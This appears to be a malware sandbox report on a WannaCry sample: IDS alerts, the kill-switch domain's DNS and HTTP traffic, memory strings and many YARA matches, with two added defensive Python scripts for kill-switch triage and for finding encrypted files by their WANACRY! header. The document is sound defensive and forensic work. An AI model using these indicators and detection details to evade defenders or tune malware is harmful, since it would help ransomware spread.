              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:50121
              Source: TrafficSnort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 8.8.8.8:53 -> 192.168.2.4:57546
              Source: TrafficSnort IDS: 2012730 ET TROJAN Known Hostile Domain ilo.brenz .pl Lookup 192.168.2.4:63284 -> 8.8.8.8:53
              Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
              Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
              Source: Joe Sandbox View; IP Address: 104.16.173.80
              Source: svchost.exe, 00000014.00000003.325716393.000001C91F659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329272939.000001C91F65A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000014.00000002.329316521.000001C91F65D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325640899.000001C91F65C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351767919.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342171336.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360438842.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365333804.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.356313484.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370609426.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347209738.0000019B7B65F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local/
Source: backgroundTaskHost.exe, 00000024.00000000.557062800.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000000.587020146.000001D4264FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.locala
Source: backgroundTaskHost.exe, 0000001C.00000000.370554204.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.356234041.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392348693.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387781701.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365252597.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.527484605.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383213238.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.341995914.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351629179.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347111414.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360350565.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378318070.0000019B7B628000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://pf.directory.live.com/profile/profile.asmx
Source: lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://pki.goog/repository/0
Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000003.565308249.000001D426696000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ris.a
Source: backgroundTaskHost.exe, 00000024.00000000.562702503.000001D426A91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ris.api.iris.micr
Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ris.api8.
Source: backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ris.iris.mi
Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://store-images.s-micros
Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.326573506.000001C91F613000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000014.00000003.325809499.000001C91F656000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000014.00000003.325657488.000001C91F648000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329211076.000001C91F64F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.bing.c
Source: backgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.bing.cpi/v
Source: mssecsvc.exe, 00000006.00000002.361889160.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.kryptoslogic.com
Source: unknown | DNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: C:\Windows\mssecsvc.exe | Code function: 4_2_00B927A7 GetTempFileNameA,CreateFileA,InternetReadFile,WriteFile,CloseHandle,CreateProcessA,InternetCloseHandle,InternetCloseHandle | 4_2_00B927A7
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com Cache-Control: no-cache
Source: loaddll32.exe, 00000000.00000002.266401486.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
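The DNS query and the two HTTP GETs for www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com above are the WannaCry kill-switch check, and the kryptoslogic.com string left in mssecsvc.exe memory shows that the sinkholed domain answered during this run. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it triages DNS and HTTP log lines for the kill-switch domain and separates hosts whose request was answered from hosts where it failed, which is the case in which the worm goes on to propagate. The flattened log format, the source IPs and the timestamps are constructed for the example.

```python
"""Kill-switch triage for WannaCry-style beaconing (added example, constructed data)."""
import re
from collections import defaultdict

# Kill-switch domain seen in the sandbox DNS and HTTP traffic.
KILL_SWITCH_DOMAIN = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"

# Hypothetical flattened log format used only for this example:
#   <ts> <src_ip> DNS query <qname>
#   <ts> <src_ip> HTTP <method> <host> <path> <status|-> [<extra>]
DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) DNS query (?P<qname>\S+)$")
HTTP_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) HTTP (?P<method>[A-Z]+) (?P<host>\S+) "
    r"(?P<path>\S+) (?P<status>\d{3}|-)(?: (?P<extra>.*))?$"
)

VERDICT_ANSWERED = "sinkhole answered"
VERDICT_UNREACHABLE = "kill switch unreachable"
VERDICT_LOOKUP_ONLY = "lookup only"

# Constructed sample log, not taken from the report.
SAMPLE_LOG = [
    "2022-07-22T10:01:03Z 10.0.0.12 DNS query www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    "2022-07-22T10:01:03Z 10.0.0.12 HTTP GET www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com / 200 Cache-Control:no-cache",
    "2022-07-22T10:01:05Z 10.0.0.12 HTTP GET www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com / 200 Cache-Control:no-cache",
    "2022-07-22T10:02:10Z 10.0.0.40 DNS query WWW.IUQERFSODP9IFJAPOSDFJHGOSURIJFAEWRWERGWEA.COM.",
    "2022-07-22T10:02:10Z 10.0.0.40 HTTP GET www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com / -",
    "2022-07-22T10:02:30Z 10.0.0.55 DNS query www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    "2022-07-22T10:03:00Z 10.0.0.77 DNS query cdn.onenote.net",
    "2022-07-22T10:03:01Z 10.0.0.77 HTTP GET www.bing.com /search 200 -",
]


def _is_kill_switch(name: str) -> bool:
    # Exact host match, case-insensitive, tolerant of an FQDN trailing dot.
    return name.rstrip(".").lower() == KILL_SWITCH_DOMAIN


def triage(lines):
    """Return {src_ip: record} for every host that touched the kill-switch domain."""
    hosts = defaultdict(lambda: {"lookups": 0, "requests": 0, "answered": 0, "first_seen": None})
    for line in lines:
        m = DNS_RE.match(line)
        if m and _is_kill_switch(m["qname"]):
            rec = hosts[m["src"]]
            rec["lookups"] += 1
            rec["first_seen"] = rec["first_seen"] or m["ts"]
            continue
        m = HTTP_RE.match(line)
        if m and _is_kill_switch(m["host"]):
            rec = hosts[m["src"]]
            rec["requests"] += 1
            rec["first_seen"] = rec["first_seen"] or m["ts"]
            # The sample only tests whether the request came back with a
            # response handle, so any status code counts as "answered".
            if m["status"] != "-":
                rec["answered"] += 1
    for rec in hosts.values():
        if rec["answered"]:
            rec["verdict"] = VERDICT_ANSWERED
        elif rec["requests"]:
            rec["verdict"] = VERDICT_UNREACHABLE
        else:
            rec["verdict"] = VERDICT_LOOKUP_ONLY
    return dict(hosts)


if __name__ == "__main__":
    for ip, rec in sorted(triage(SAMPLE_LOG).items()):
        print(f"{ip}: {rec['verdict']} (lookups={rec['lookups']}, "
              f"requests={rec['requests']}, answered={rec['answered']}, first={rec['first_seen']})")
```

The host whose request got no response is the one to contain first: with egress blocked, DNS failing or a proxy-only network, the kill-switch check fails and the propagation routine runs. A host that did reach the sinkhole is still infected and still needs cleanup; the answered request only means this copy stopped before spreading.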

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\tasksche.exe | Code function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY! | 29_2_004014A6
Source: Yara match | File source: FjYNZSPNkt.dll, type: SAMPLE
Source: Yara match | File source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.263630110.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.267296098.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.266941602.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.261950970.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.274690512.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.272255673.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.265422211.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6440, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\mssecsvc.exe, type: DROPPED
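The tasksche.exe code function above reads a file (CreateFileA, GetFileSizeEx, GlobalAlloc) and memcmp's its start against the 8-byte string WANACRY!, the header that marks a file as already encrypted. The script below is an added example, not code from the report or from the sample: it scopes encryption on a disk by that header rather than by file name, so that files carrying the marker without the usual suffix and suffixed files that never received the marker are both reported. The directory tree, file names and contents are constructed for the example; .WNCRY is the suffix WannaCry appends to encrypted files.

```python
"""Scope WannaCry encryption by file header (added example, constructed fixture)."""
import os
import tempfile
from pathlib import Path

# Magic that tasksche.exe compares against the first 8 bytes of a file.
WANACRY_MAGIC = b"WANACRY!"
# Suffix WannaCry appends to files it has encrypted.
ENCRYPTED_SUFFIX = ".wncry"


def has_wannacry_header(data: bytes) -> bool:
    """True if the buffer starts with the full WANACRY! marker."""
    return data[:len(WANACRY_MAGIC)] == WANACRY_MAGIC


def file_has_header(path: Path) -> bool:
    """Read only the first 8 bytes; unreadable or short files count as unmarked."""
    try:
        with open(path, "rb") as fh:
            return has_wannacry_header(fh.read(len(WANACRY_MAGIC)))
    except OSError:
        return False


def scan_tree(root):
    """Classify every file under root by header and by suffix.

    encrypted:               header present and .WNCRY suffix
    header_without_suffix:   marker present but the name was never changed
    suffix_without_header:   .WNCRY name but no marker (truncated/partial write)
    """
    root = Path(root)
    result = {"scanned": 0, "encrypted": [], "header_without_suffix": [],
              "suffix_without_header": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            result["scanned"] += 1
            header = file_has_header(path)
            suffixed = name.lower().endswith(ENCRYPTED_SUFFIX)
            rel = path.relative_to(root).as_posix()
            if header and suffixed:
                result["encrypted"].append(rel)
            elif header:
                result["header_without_suffix"].append(rel)
            elif suffixed:
                result["suffix_without_header"].append(rel)
    for key in ("encrypted", "header_without_suffix", "suffix_without_header"):
        result[key].sort()
    return result


def build_sample_tree():
    """Constructed fixture covering each branch of scan_tree; not real victim data."""
    root = Path(tempfile.mkdtemp(prefix="wncry_triage_"))
    (root / "docs").mkdir()
    (root / "docs" / "report.docx.WNCRY").write_bytes(WANACRY_MAGIC + b"\x00\x01" * 32)
    (root / "photo.jpg").write_bytes(WANACRY_MAGIC + b"\xff" * 16)   # marker, no rename
    (root / "notes.txt").write_bytes(b"quarterly numbers\n")        # untouched
    (root / "budget.xlsx.WNCRY").write_bytes(b"WANA")               # truncated marker
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    report = scan_tree(sample_root)
    print(f"scanned {report['scanned']} files under {sample_root}")
    for key in ("encrypted", "header_without_suffix", "suffix_without_header"):
        for rel in report[key]:
            print(f"  {key}: {rel}")
```

Counting by suffix alone would miss photo.jpg and overcount budget.xlsx.WNCRY; the header check is what the sample itself uses to decide whether a file is already encrypted, so it is the right criterion for scoping and for deciding which files a decryptor could ever act on.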

              System Summary

Source: FjYNZSPNkt.dll, type: SAMPLE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: FjYNZSPNkt.dll, type: SAMPLE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 29.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 29.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 6.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 4.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page | Author: us-cert code analysis team
Source: 11.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry | Author: ReversingLabs
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (based on rule by US CERT)
Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware | Author: Florian Roth (with the help of binar.ly)
